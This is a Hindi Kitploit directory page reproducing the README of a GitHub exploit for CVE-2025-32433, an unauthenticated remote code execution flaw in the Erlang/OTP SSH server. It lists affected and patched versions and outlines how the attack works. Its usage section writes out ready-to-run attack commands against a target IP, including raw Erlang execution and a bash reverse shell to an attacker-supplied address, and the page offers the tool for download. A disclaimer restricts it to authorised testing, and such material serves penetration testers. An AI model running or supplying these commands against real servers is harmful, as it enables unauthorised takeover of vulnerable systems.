Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32433-Exploit-edited — Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility | Kitploit
उपकरण/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRed TeamingRemote Access Tool
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-32433 एक्सप्लॉइट (विंडोज संगत)

Erlang/OTP SSH अप्रमाणित दूरस्थ कोड निष्पादन

विवरण

इस रिपॉजिटरी में CVE-2025-32433 के लिए एक एक्सप्लॉइट है, जो Erlang/OTP SSH सर्वर में एक गंभीर अप्रमाणित दूरस्थ कोड निष्पादन भेद्यता है।

मुख्य विशेषताएं:

  • ✅ प्री-प्रमाणीकरण RCE एक्सप्लॉइट
  • ✅ विंडोज GBK एन्कोडिंग संगतता के लिए ठीक किया गया
  • ✅ Erlang/OTP संस्करणों पर काम करता है ≤ 27.3.2, ≤ 26.2.5.10, ≤ 25.3.2.19

भेद्यता विवरण

CVE ID: CVE-2025-32433
गंभीरता: गंभीर
प्रभाव: अप्रमाणित दूरस्थ कोड निष्पादन

यह भेद्यता हमलावरों को बिना प्रमाणीकरण के विशेष रूप से तैयार किए गए SSH प्रोटोकॉल संदेश भेजकर Erlang/OTP SSH सर्वरों पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

उपयोग

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

तर्क

root@kitploit:~
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute

विंडोज एन्कोडिंग सुधार

यह संस्करण मूल एक्सप्लॉइट में मौजूद एन्कोडिंग समस्या को ठीक करता है:

समस्या: मूल एक्सप्लॉइट ने यूनिकोड चेकमार्क वर्ण (✓, U+2713) का उपयोग किया जो विंडोज पर GBK एन्कोडिंग त्रुटियों का कारण बनता है:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

समाधान: क्रॉस-प्लेटफॉर्म संगतता के लिए यूनिकोड वर्ण को मानक ASCII + वर्ण से बदल दिया गया।

तकनीकी विवरण

एक्सप्लॉइट इस प्रकार काम करता है:

  1. SSH कनेक्शन और बैनर एक्सचेंज स्थापित करना
  2. SSH_MSG_KEXINIT पैकेट भेजना
  3. SSH_MSG_CHANNEL_OPEN के साथ SSH चैनल खोलना
  4. प्रमाणीकरण से पहले दुर्भावनापूर्ण exec कमांड के साथ SSH_MSG_CHANNEL_REQUEST भेजना
  5. os:cmd() के माध्यम से मनमाना Erlang कोड निष्पादित करना

संदर्भ

  • GitHub सुरक्षा सलाह
  • Erlang/OTP कमिट फिक्स
  • RFC 4254 - SSH कनेक्शन प्रोटोकॉल
  • ProDefense CVE-2025-32433

पैच किए गए संस्करण

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

अस्वीकरण

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।

लाइसेंस

MIT लाइसेंस

लेखक

चुज़ौX द्वारा विंडोज संगतता के लिए संशोधित

टूल डाउनलोड करें